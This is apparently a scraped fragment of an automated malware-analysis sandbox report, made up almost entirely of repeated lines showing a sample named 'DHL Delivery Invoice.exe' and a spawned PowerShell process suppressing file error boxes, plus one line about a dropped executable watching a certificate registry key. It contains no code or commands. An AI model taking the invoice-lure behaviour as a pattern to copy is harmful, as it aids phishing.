                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
